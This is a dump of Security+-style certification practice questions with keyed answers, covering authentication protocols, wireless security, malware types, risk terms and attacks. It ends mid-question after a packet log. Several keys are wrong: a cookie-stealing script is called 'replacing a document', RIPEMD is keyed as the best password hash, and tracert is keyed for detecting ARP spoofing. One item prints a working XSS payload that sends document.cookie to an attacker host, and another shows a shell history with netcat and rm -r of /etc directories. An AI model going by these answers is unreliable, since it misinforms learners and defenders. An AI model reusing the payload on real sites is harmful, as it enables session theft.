A security administrator has installed a new KDC for the corporate environment. Which of the following authentication protocols is the security administrator planning to implement across the organization? A. LDAP B. RADIUS C. Kerberos D. XTACACS
C. Kerberos
A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? A. Tunnel mode IPSec B. Transport mode VPN IPSec C. L2TP D. SSL VPN
C. L2TP
A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support ticket contains the following information: Source: 192.168.1.137 Destination: 10.113.10.8 Protocol: TCP Ports: 636 Time-of-day restriction: None Proxy bypass required: Yes Which of the following is being requested to be implemented? A. DNSSEC B. S/MIME C. LDAPS D. RDP
C. LDAPS
The Chief Information Security Officer (CISO) of a university is concerned about potential transmission of usernames and passwords in cleartext when authenticating to a directory server. Which of the following would BEST mitigate the CISO's concerns? A. SFTP B. SNMPv3 C. LDAPS D. SMB
C. LDAPS
A systems administrator has created network file shares for each department with associated security groups for each role within the organization. Which of the following security concepts is the administrator implementing? A. Separation of duties B. Permission auditing C. Least privilege D. Standard naming convention
C. Least privilege
One of the system administrators at a company is assigned to maintain a secure computer lab. The administrator has rights to configure machines, install software, and perform user account maintenance. However, the administrator cannot add new computers to the domain, because that requires authorization from the Information Assurance Officer. This is an example of which of the following? A. Mandatory access B. Rule-based access control C. Least privilege D. Job rotation
C. Least privilege
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select -ExpandProperty name; if ($members -notcontains "JohnDoe") { Remove-Item -Path C:\Database -Recurse -Force } Which of the following did the security administrator discover? A. Ransomware B. Backdoor C. Logic bomb D. Trojan
C. Logic bomb
Ann, a security administrator, has concerns regarding her company's wireless network. The network is open and available for visiting prospective clients in the conference room, but she notices that many more devices are connecting to the network than should be. Which of the following would BEST alleviate Ann's concerns with minimum disturbance of current functionality for clients? A. Enable MAC filtering on the wireless access point. B. Configure WPA2 encryption on the wireless access point. C. Lower the antenna's broadcasting power. D. Disable SSID broadcasting.
C. Lower the antenna's broadcasting power.
Which of the following is the GREATEST security risk of two or more companies working together under a Memorandum of Understanding? A. Budgetary considerations may not have been written into the MOU, leaving an entity to absorb more cost than intended at signing. B. MOUs have strict policies in place for services performed between the entities and the penalties for compromising a partner are high. C. MOUs are generally loose agreements and therefore may not have strict guidelines in place to protect sensitive data between the two entities. D. MOUs between two companies working together cannot be held to the same legal standards as SLAs.
C. MOUs are generally loose agreements and therefore may not have strict guidelines in place to protect sensitive data between the two entities.
A security administrator implements access controls based on the security classification of the data and need-to-know information. Which of the following BEST describes this level of access control? A. Implicit deny B. Role-based Access Control C. Mandatory Access Controls D. Least privilege
C. Mandatory Access Controls
A security team has established a security awareness program. Which of the following would BEST prove the success of the program? A. Policies B. Procedures C. Metrics D. Standards
C. Metrics
A distributed denial of service attack can BEST be described as: A. Invalid characters being entered into a field in a database application. B. Users attempting to input random or invalid data into fields within a web browser application. C. Multiple computers attacking a single target in an organized attempt to deplete its resources. D. Multiple attackers attempting to gain elevated privileges on a target system.
C. Multiple computers attacking a single target in an organized attempt to deplete its resources.
A security team has deployed a new UTM to connect different segments of the corporate network. In addition to the UTM, each host has its own firewall and HIPS. The new UTM implements many of the same protections as the host-based firewall and HIPS, but the security team plans to leave both of these protections in place. Which of the following BEST describes the reason for this redundancy? A. Having multiple security devices can result in faster performance. B. The UTM cannot protect against threats from outside the network. C. Multiple forms of protection is preferred over single points of failure. D. A UTM cannot perform malware analysis, but a HIPS can.
C. Multiple forms of protection is preferred over single points of failure.
Mike, a network administrator, has been asked to passively monitor network traffic to the company's sales websites. Which of the following would be BEST suited for this task? A. HIDS B. Firewall C. NIPS D. Spam filter
C. NIPS
This form of wireless communications has three modes of operation: peer-to-peer mode, read/write mode, and card emulation. A. Wi-Fi B. Bluetooth C. Near-Field Communication (NFC) D. Biometrics
C. Near-Field Communication (NFC)
A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented? A. Host-based firewall B. Enterprise patch management system C. Network-based intrusion prevention system D. Application blacklisting E. File integrity checking
C. Network-based intrusion prevention system
Which of the following is a penetration tester performing when running an SMB NULL session scan of a host to determine valid usernames and share names? A. Credentialed vulnerability scan B. Passive scan C. Non-credentialed scan D. Non-intrusive vulnerability testing E. Penetration testing
C. Non-credentialed scan
A web developer improves client access to the company's REST API. Authentication needs to be tokenized but must not expose the client's password. Which of the following methods would BEST meet the developer's requirements? A. SAML B. LDAP C. OAuth D. Shibboleth
C. OAuth
Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources? A. RADIUS B. Kerberos C. OAuth D. MSCHAP
C. OAuth
Which of the following protocols is used to validate whether trust is in place and accurate by returning responses of either "good", "unknown", or "revoked"? A. CRL B. PKI C. OCSP D. RA
C. OCSP
Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks? A. Captive portal B. Extended validation certificate C. OCSP stapling D. Object identifiers E. Key escrow
C. OCSP stapling
A security researcher wants to reverse engineer an executable file to determine if it is malicious. The file was found on an underused server and appears to contain a zero-day exploit. Which of the following can the researcher do to determine if the file is malicious in nature? A. TCP/IP socket design review B. Executable code review C. OS Baseline comparison D. Software architecture review
C. OS Baseline comparison
A department head at a university resigned on the first day of spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring? A. Time-of-day restrictions B. Permissions auditing and review C. Offboarding D. Account expiration
C. Offboarding
Which of the following implementation steps would be appropriate for a public wireless hot-spot? A. Reduce power level B. Disable SSID broadcast C. Open system authentication D. MAC filter
C. Open system authentication
Three of the primary security control types that can be implemented are: A. Supervisory, subordinate, and peer. B. Personal, procedural, and legal. C. Operational, technical, and management. D. Mandatory, discretionary, and permanent.
C. Operational, technical, and management.
This type of firewall passes or blocks traffic to specific ports or IP addresses based on predetermined rules? A. Stateful inspection B. Proxy C. Packet-filtering D. Unified Threat Management
C. Packet-filtering
Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? (Select TWO) A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout
C. Password complexity D. Password history
A security administrator wants to check user password complexity. Which of the following is the BEST tool to use? A. Password history B. Password logging C. Password cracker D. Password hashing
C. Password cracker
An administrator finds that non-production servers are being frequently compromised, production servers are rebooting at unplanned times and kernel versions are several releases behind the version with all current security fixes. Which of the following should the administrator implement? A. Snapshots B. Sandboxing C. Patch management D. Intrusion detection system
C. Patch management
After a recent security breach at a hospital, it was discovered that nursing staff members, who were working the overnight shift, searched for and accessed private health information for local celebrities who were patients at the hospital. Which of the following would have enabled the hospital to discover this behavior BEFORE a breach occurred? A. Time-of-day restrictions B. Usage reviews C. Periodic permission audits D. Location-based policy enforcement
C. Periodic permission audits
A company has won an important government contract. Several employees have been transferred from their existing projects to support the new contract. Some of the employees who have transferred will be working long hours and still need access to their project information to transition work to their replacements. Which of the following should be implemented to validate that the appropriate offboarding process has been followed? A. Separation of duties B. Time-of-day restrictions C. Permission auditing D. Mandatory access control
C. Permission auditing
Due to a configuration error, sales and marketing staff were able to access highly sensitive, commercial R&D information for a period of five days before the issue was discovered by an automated system, corrected, and flagged for review. Inspection of logs and monitoring systems by security analysts indicated that no sensitive data was accessed. Based on this scenario, which of the following should a risk manager be MOST concerned about? A. Data exfiltration B. Inside threat C. Permission issues D. Baseline deviation
C. Permission issues
An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact. The rows, from high to low likelihood, with impact read left to right from Low to Medium to High, are: High likelihood: Yellow, Red, Pink; Medium likelihood: Green, Yellow, Red; Low likelihood: Green, Green, Yellow. Which of the following is this table an example of? A. Internal threat assessment B. Privacy impact assessment C. Qualitative risk assessment D. Supply chain assessment
C. Qualitative risk assessment
A small business needs to incorporate fault tolerance into their infrastructure to increase data availability. Which of the following options would be the BEST solution at a minimal cost? A. Clustering B. Mirrored server C. RAID D. Tape backup
C. RAID
A security analyst is reviewing firewall logs while investigating a compromised web server. The following ports appear in the log: 22, 25, 445, 1433, 3128, 3389, 6667 Which of the following protocols was used to access the server remotely? A. LDAP B. HTTP C. RDP D. HTTPS
C. RDP
A datacenter requires that staff be able to identify whether or not items have been removed from the facility. Which of the following controls will allow the organization to provide automated notification of item removal? A. CCTV B. Environmental monitoring C. RFID D. EMI shielding
C. RFID
A security administrator is choosing an algorithm to generate password hashes. Which of the following would offer the BEST protection against offline brute force attacks? A. MD5 B. 3DES C. RIPEMD D. SHA-1
C. RIPEMD
Which of the following defines a business goal for system restoration and acceptable data loss? A. MTTR B. MTBF C. RPO D. Warm site
C. RPO
Which of the following describes the maximum amount of time a mission essential function can operate without the systems it depends on before significantly impacting the organization? A. MTBF B. MTTR C. RTO D. RPO
C. RTO
Which of the following uses precomputed hashes to guess passwords? A. Iptables B. NAT tables C. Rainbow tables D. ARP tables
C. Rainbow tables
Which of the following can be used on a smartphone to BEST protect against sensitive data loss if the device is stolen? (Select TWO). A. Tethering B. Screen lock PIN C. Remote wipe D. Email password E. GPS tracking F. Device encryption
C. Remote wipe F. Device encryption
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability
C. Resiliency
A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk? A. Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information. B. Restrict screen capture features on the devices when using the custom application and the contact information. C. Restrict contact information storage data flow so it is only shared with the customer application. D. Require complex passwords for authentication when accessing the contact information.
C. Restrict contact information storage data flow so it is only shared with the customer application.
A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? A. Vulnerability scanner B. Network-based IDS C. Rogue system detection D. Configuration compliance scanner
C. Rogue system detection
An incident response analyst in a corporate security operations center receives a phone call from a SOC analyst. The SOC analyst explains that the help desk reimaged a workstation that was suspected of being infected with an unknown type of malware; however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts? A. Ransomware B. Logic bomb C. Rootkit D. Adware
C. Rootkit
The system administrator has deployed updated security controls for the network to limit risk of attack. The security manager is concerned that controls continue to function as intended to maintain appropriate security posture. Which of the following risk mitigation strategies is MOST important to the security manager? A. User permissions B. Policy enforcement C. Routine audits D. Change management
C. Routine audits
A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files? A. HTTPS B. LDAPS C. SCP D. SNMPv3
C. SCP
Which of the following protocols operates at the HIGHEST level of the OSI model? A. ICMP B. IPSec C. SCP D. TCP
C. SCP
Which of the following protocols allows for secure transfer of files? (Select TWO). A. ICMP B. SNMP C. SFTP D. SCP E. TFTP
C. SFTP D. SCP
A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? (Select TWO). A. SSL/TLS B. S/MIME C. SNMPv3 D. Syslog E. SRTP F. Shibboleth
C. SNMPv3 D. Syslog
During a breach investigation, you notice that the attacker entered the database through a web front end application by manipulating the database code to exploit a vulnerability. What is the most likely name for this type of attack? A. SQL parsing B. Database injection C. SQL injection D. Session hijacking
C. SQL injection
A vulnerability assessment indicates that a router can be accessed from default port 80 and default port 22. Which of the following should be executed on the router to prevent access via these ports? (Select TWO). A. FTP service should be disabled B. HTTPS service should be disabled C. SSH service should be disabled D. HTTP service should be disabled E. Telnet service should be disabled
C. SSH service should be disabled D. HTTP service should be disabled
The POODLE attack is an MITM exploit that affects: A. TLS1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher
C. SSLv3.0 with CBC mode cipher
When using a cryptographic function to store a password, which of the following should be used to avoid similar output from similar passwords? A. Hashing B. Field padding C. Salting D. Key rotating
C. Salting
A software developer wants to prevent stored passwords from being easily decrypted. When the password is stored by the application, additional text is added to each password before the password is hashed. This technique is known as: A. Symmetric cryptography. B. Private key cryptography. C. Salting. D. Rainbow tables.
C. Salting.
An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? A. Back up and archive the production data to an external source. B. Disable notifications in the production system. C. Scrub the confidential information. D. Encrypt the data prior to the stress test.
C. Scrub the confidential information.
A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan? A. Ping sweep B. Time-delay port scanning C. Service identification D. Cipher suite order
C. Service identification
A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server? A. 802.1X B. SSH C. Shared secret D. SNMPv3 E. CHAP
C. Shared secret
When performing the daily review of the system vulnerability scans of the network, Joe, the administrator, noticed several security-related vulnerabilities with an assigned vulnerability identification number. Joe researches the assigned vulnerability identification number on the vendor website. Joe proceeds with applying the recommended solution for the identified vulnerability. Which of the following is the type of vulnerability described? A. Network based B. IDS C. Signature based D. Host based
C. Signature based
A user attempting to log on to a workstation for the first time is prompted for the following information before being granted access: username, password, and a four-digit security pin that was mailed to him during account registration. This is an example of which of the following? A. Dual-factor authentication B. Multifactor authentication C. Single factor authentication D. Biometric authentication
C. Single factor authentication
A security administrator has concerns about new types of media which allow for the mass distribution of personal comments to a select group of people. To mitigate the risks involved with this media, employees should receive training on which of the following? A. Peer to Peer B. Mobile devices C. Social networking D. Personally owned devices
C. Social networking
Which of the following authentication concepts is gait analysis MOST closely associated with? A. Somewhere you are B. Something you are C. Something you do D. Something you know
C. Something you do
Which of the following BEST describes the process of altering the bits of a media file to embed a hidden message? A. Encryption B. Diffusion C. Steganography D. Hashing
C. Steganography
Which of the following would be considered multifactor authentication? A. Hardware token and smart card B. Voice recognition and retina scan C. Strong password and fingerprint D. PIN and security questions
C. Strong password and fingerprint
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration
C. System sprawl
A security administrator is reviewing the company's continuity plan. The plan specifies an RTO of six hours and RPO of two days. Which of the following is the plan describing? A. Systems should be restored within six hours and no later than two days after the incident. B. Systems should be restored within two days and should remain operational for at least six hours. C. Systems should be restored within six hours with a minimum of two days worth of data. D. Systems should be restored within two days with a minimum of six hours worth of data.
C. Systems should be restored within six hours with a minimum of two days worth of data.
Which of the following is an authentication and accounting service that uses TCP for connecting to routers and switches? A. DIAMETER B. RADIUS C. TACACS+ D. Kerberos
C. TACACS+
Pete needs to open ports on the firewall to allow for secure transmission of files. Which of the following ports should be opened on the firewall? A. TCP 23 B. UDP 69 C. TCP 22 D. TCP 21
C. TCP 22
An organization's Chief Information Officer (CIO) recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy? A. HTTPS B. SMTP C. TLS D. SFTP
C. TLS
Which of the following protocols is used to authenticate the client and server's digital certificate? A. PEAP B. DNS C. TLS D. ICMP
C. TLS
Which of the following is a hardware based encryption device? A. EFS B. TrueCrypt C. TPM D. SLE
C. TPM
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access? A. Phishing B. Man-in-the-middle C. Tailgating D. Watering hole E. Shoulder surfing
C. Tailgating
You observe a delivery person entering your building by following an employee through a locked door into a secure facility. Which term best describes this type of attack: A. Shoulder surfing B. Reciprocity C. Tailgating D. Whaling
C. Tailgating
A new application needs to be deployed on a virtual server. The virtual server hosts a SQL server that is used by several employees. Which of the following is the BEST approach for implementation of the new application on the virtual server? A. Take a snapshot of the virtual server after installing the new application and store the snapshot in a secure location. B. Generate a baseline report detailing all installed applications on the virtualized server after installing the new application. C. Take a snapshot of the virtual server before installing the new application and store the snapshot in a secure location. D. Create an exact copy of the virtual server and store the copy on an external hard drive after installing the new application.
C. Take a snapshot of the virtual server before installing the new application and store the snapshot in a secure location.
To help prevent unauthorized access to PCs, a security administrator implements screen savers that lock the PC after five minutes of inactivity. Which of the following controls is being described in this situation? A. Management B. Administrative C. Technical D. Operational
C. Technical
Which statement is TRUE about the operation of a packet sniffer? A. It can only have one interface on a management network. B. They are required for firewall operation and stateful inspection. C. The Ethernet card must be placed in promiscuous mode. D. It must be placed on a single virtual LAN interface.
C. The Ethernet card must be placed in promiscuous mode.
An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onload="document.location.replace('http://hacker/post.asp?victim&message=' + document.cookie + '<br>' + 'URL:' + document.location);"></body></HTML> Which of the following BEST explains what the attacker is doing? A. The attacker is replacing a cookie. B. The attacker is stealing a document. C. The attacker is replacing a document. D. The attacker is deleting a cookie.
C. The attacker is replacing a document.
A security analyst runs a monthly file integrity check on the main web server. When analyzing the logs, the analyst observed the following entries (File | Previous hash | Current hash): cmd.exe | c4ca6a34c5e3a0f98dc03d4f8adf56a3 | a24f5a34c5e3a0f98dc03d4f8ac5c0e2; iexplore.exe | b9c8e3f24b38c94a7c5f3d9d8d4e7ab3 | b9c8e3f24b38c94a7c5f3d9d8d4e7ab3. No OS patches were applied to this server during this period. Considering the log output, which of the following is the BEST conclusion? A. The cmd.exe was executed on the scanned server between the two dates. An incident ticket should be created. B. The iexplore.exe was executed on the scanned server between the two dates. An incident ticket should be created. C. The cmd.exe was updated on the scanned server. An incident ticket should be created. D. The iexplore.exe was updated on the scanned server. An incident ticket should be created.
C. The cmd.exe was updated on the scanned server. An incident ticket should be created.
A security administrator needs to update the OS on all the switches in the company. Which of the following MUST be done before any actual switch configuration is performed? A. The request needs to be sent to the incident management team. B. The request needs to be approved through the incident management process. C. The request needs to be approved through the change management process. D. The request needs to be sent to the change management team.
C. The request needs to be approved through the change management process.
Acme Corp has selectively outsourced proprietary business processes to ABC Services. Due to some technical issues, ABC Services wants to send some of Acme Corp's debug data to a third-party vendor for problem resolution. Which of the following MUST be considered prior to sending data to a third party? A. The data should be encrypted prior to transport B. This would not constitute unauthorized data sharing C. This may violate data ownership and non-disclosure agreements D. Acme Corp should send the data to ABC Services' vendor instead
C. This may violate data ownership and non-disclosure agreements
The company's sales team plans to work late to provide the Chief Executive Officer (CEO) with a special report of sales before the quarter ends. After working for several hours, the team finds they cannot save or print the reports. Which of the following controls is preventing them from completing their work? A. Discretionary access control B. Role-based access control C. Time of Day access control D. Mandatory access control
C. Time of Day access control
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue? A. The password expired on the account and needed to be reset B. The employee does not have the rights needed to access the database remotely C. Time-of-day restrictions prevented the account from logging in D. The employee's account was locked out and needed to be unlocked
C. Time-of-day restrictions prevented the account from logging in
During a penetration test, the tester performs a preliminary scan for any responsive hosts. Which of the following BEST explains why the tester is doing this? A. To determine if the network routers are improperly forwarding request packets B. To identify the total number of hosts and determine if the network can be victimized by a DoS attack C. To identify servers for subsequent scans and further investigation D. To identify unresponsive hosts and determine if those could be used as zombies in a follow-up scan
C. To identify servers for subsequent scans and further investigation
Which of the following is the BEST reason to run an untested application in a sandbox? A. To allow the application to take full advantage of the host system's resources and storage B. To utilize the host system's antivirus and firewall applications instead of running its own protection C. To prevent the application from acquiring escalated privileges and accessing its host system D. To increase application processing speed so the host system can perform real-time logging
C. To prevent the application from acquiring escalated privileges and accessing its host system
Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment? A. To reduce the operational risk so application users can continue using the system while the patch is being applied in the production environment. B. To reduce security risk by having a baseline against which the patched system can be compared if the system becomes compromised. C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails. D. To reduce security risk so vulnerability scans can be performed on a pre- and post-patched system and the results can be compared.
C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails.
Sara, a user, downloads a keygen to install pirated software. After running the keygen, system performance is extremely slow and numerous antivirus alerts are displayed. Which of the following BEST describes this type of malware? A. Logic bomb B. Worm C. Trojan D. Adware
C. Trojan
Pete, the system administrator, wants to restrict access to advertisements, games, and gambling web sites. Which of the following devices would BEST achieve this goal? A. Firewall B. Switch C. URL content filter D. Spam filter
C. URL content filter
A Chief Information Security Officer (CISO) wants to implement two-factor authentication within the company. Which of the following would fulfill the CISO's requirements? A. Username and password B. Retina scan and fingerprint scan C. USB token and PIN D. Proximity badge and token
C. USB token and PIN
An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO). A. Familiarity B. Scarcity C. Urgency D. Authority E. Consensus
C. Urgency D. Authority
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using? A. Guest account B. Service account C. User account D. Local Account
C. User account
An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employee receive? A. Shared account B. Privileged account C. User account D. Service account
C. User account
A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and moving all heavy applications and storage to a centralized server that hosts all of the company's required desktop applications. Which of the following describes the BEST deployment method to meet these requirements? A. IaaS B. VM sprawl C. VDI D. PaaS
C. VDI
Which of the following BEST describes a protective countermeasure for SQL injection? A. Eliminating cross-site scripting vulnerabilities B. Installing an IDS to monitor network traffic C. Validating user input in web applications D. Placing a firewall between the Internet and database servers
C. Validating user input in web applications
Which of the following is required to allow multiple servers to exist on one physical server? A. Software as a Service (SaaS) B. Platform as a Service (PaaS) C. Virtualization D. Infrastructure as a Service (IaaS)
C. Virtualization
Which of the following describes the key difference between vishing and phishing attacks? A. Phishing is used by attackers to steal a person's identity. B. Vishing attacks require some knowledge of the target of attack. C. Vishing attacks are accomplished using telephony services. D. Phishing is a category of social engineering attack.
C. Vishing attacks are accomplished using telephony services.
Which of the following would a security administrator implement in order to discover comprehensive security threats on a network? A. Design reviews B. Baseline reporting C. Vulnerability scan D. Code review
C. Vulnerability scan
A company wishes to deploy a wireless network. Management insists that each individual user should have to authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be the MOST appropriate to achieve this objective? A. WPA2 PSK B. WEP C. WPA Enterprise D. 802.11r E. Captive portal
C. WPA Enterprise
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? A. WPA+CCMP B. WPA2+CCMP C. WPA+TKIP D. WPA2+TKIP
C. WPA+TKIP
Due to hardware limitations, a technician must implement a wireless encryption algorithm that uses the RC4 protocol. Which of the following is a wireless encryption solution that the technician should implement while ensuring the STRONGEST level of security? A. WPA2-AES B. 802.11ac C. WPA-TKIP D. WEP
C. WPA-TKIP
A company storing data on a secure server wants to ensure it is legally able to dismiss and prosecute staff who intentionally access the server via Telnet and illegally tamper with customer data. Which of the following administrative controls should be implemented to BEST achieve this? A. Command shell restrictions B. Restricted interface C. Warning banners D. Session output pipe to /dev/null
C. Warning banners
Which of the following can be implemented in hardware or software to protect a web server from cross-site scripting attacks? A. Intrusion Detection System B. Flood Guard Protection C. Web Application Firewall D. URL Content Filter
C. Web Application Firewall
Which of the following technical controls is BEST used to define which applications a user can install and run on a company issued mobile device? A. Authentication B. Blacklisting C. Whitelisting D. Acceptable use policy
C. Whitelisting
The network team has detected a large amount of traffic between workstations on the network. The traffic was initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected? A. Backdoor B. Rootkit C. Worm D. Spyware
C. Worm
An attacker used an undocumented and unknown application exploit to gain access to a file server. Which of the following BEST describes this type of attack? A. Integer overflow B. Cross-site scripting C. Zero-day D. Session hijacking E. XML injection
C. Zero-day
An active/passive configuration has an impact on: A. confidentiality B. integrity C. availability D. non-repudiation
C. availability
Performing a penetration test without any advance knowledge of what will be found is an example of a: A. white box test B. gray box test C. black box test D. sandbox test
C. black box test
Which of the following firewall rules only denies DNS zone transfers? A. deny udp any any port 53 B. deny ip any any C. deny tcp any any port 53 D. deny all dns packets
C. deny tcp any any port 53
Results from a vulnerability analysis indicate that all enabled virtual terminals on a router can be accessed using the same password. The company's network device security policy mandates that at least one virtual terminal have a different password than the other virtual terminals. Which of the following sets of commands would meet this requirement? A. line vty 0 6 P@s5W0Rd password line vty 7 Qwer++!Y password B. line console 0 password password line vty 0 4 password P@s5W0Rd C. line vty 0 3 password Qwer++!Y line vty 4 password P@s5W0Rd D. line vty 0 3 password Qwer++!Y line console 0 password P@s5W0Rd
C. line vty 0 3 password Qwer++!Y line vty 4 password P@s5W0Rd
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pskill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket? A. traceroute 8.8.8.8 B. ping -1 30 8.8.8.8 -a 600 C. nc -1 192.168.5.1 -p 9856 D. pskill pid 9487
C. nc -1 192.168.5.1 -p 9856
A security analyst is checking the bash command history on a Linux host that was involved in a data breach. The data breach stemmed from the Linux host running a series of commands against a web server on the internal network, which exploited a vulnerability in an unpatched, outdated Apache module. Given this scenario, which of the following commands might the analyst find in the bash command history for banner grabbing? (Select TWO). A. arp B. tracert C. nmap D. telnet E. nslookup F. grep
C. nmap D. telnet
A procedure differs from a policy in that it: A. is a high-level statement regarding the company's position on a topic. B. sets a minimum expected baseline of behavior. C. provides step-by-step instructions for performing a task. D. describes adverse actions when violations occur.
C. provides step-by-step instructions for performing a task.
A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use: A. the current internal key management system. B. a third-party key management system that will reduce operating costs. C. risk benefits analysis results to make a determination. D. a software solution including secure key escrow capabilities.
C. risk benefits analysis results to make a determination.
Finance department employees are reporting slow network connectivity and SSL/TLS certificate errors when they access secure websites. A security administrator suspects a computer in the finance VLAN may have been compromised and is impersonating the router's IP address using an MITM attack. Which of the following commands should the security administrator use to verify this finding? A. arp B. route C. tracert D. nmap E. nslookup
C. tracert
The BEST methods for a web developer to prevent the website application code from being vulnerable to cross-site request forgery (XSRF) are to: (Select TWO). A. permit redirection to Internet-facing web URLs. B. ensure all HTML tags are enclosed in angle brackets, e.g., "<" and ">". C. validate and filter input on the server side and client side. D. use a web proxy to pass website requests between the user and the application. E. restrict and sanitize use of special characters in input and URLs.
C. validate and filter input on the server side and client side. E. restrict and sanitize use of special characters in input and URLs.
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet:
c:\nslookup -querytype=MX comptia.org
Server: Unknown
Address: 198.51.100.45
comptia.org MX preference=10, mail exchanger = 92.68.102.33
comptia.org MX preference=20, mail exchanger = exchg1.comptia.org
exchg1.comptia.org internet address = 192.168.102.67
Which of the following should the penetration tester conclude about the command output? A. The public/private views on the Comptia.org DNS servers are misconfigured. B. Comptia.org is running an older mail server, which may be vulnerable to exploits. C. The DNS SPF records have not been updated for Comptia.org. D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.
D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.
A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access? A. Intrusion Prevention Systems B. MAC filtering C. Flood guards D. 802.1x
D. 802.1x
While configuring a new access layer switch, the administrator, Joe, was advised that he needed to make sure that only devices authorized to access the network would be permitted to login and utilize resources. Which of the following should the administrator implement to ensure this happens? A. Log Analysis B. VLAN Management C. Network separation D. 802.1x
D. 802.1x
A company has several conference rooms with wired network jacks that are used by both employees and guests. Employees need access to internal resources and guests only need access to the Internet. Which of the following combinations is BEST to meet the requirements? A. NAT and DMZ B. VPN and IPSec C. Switches and a firewall D. 802.1x and VLANs
D. 802.1x and VLANs
A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information:
Time        IP Src          IP Dst          Src Port   Dst Port   Protocol
12.490000   192.168.2.155   192.168.2.100   32857      445        SMBv1
12.490005   192.168.2.155   192.168.2.101   32858      445        SMBv1
12.490013   192.168.2.155   192.168.2.102   32859      445        SMBv1
12.490018   192.168.2.155   192.168.2.103   32860      445        SMBv1
12.490022   192.168.2.155   192.168.2.104   32861      445        SMBv1
12.490024   192.168.2.155   192.168.2.105   32862      445        SMBv1
12.490028   192.168.2.155   192.168.2.106   32863      445        SMBv1
12.490029   192.168.2.155   192.168.2.107   32864      445        SMBv1
12.490035   192.168.2.155   192.168.2.108   32865      445        SMBv1
12.490037   192.168.2.155   192.168.2.109   32866      445        SMBv1
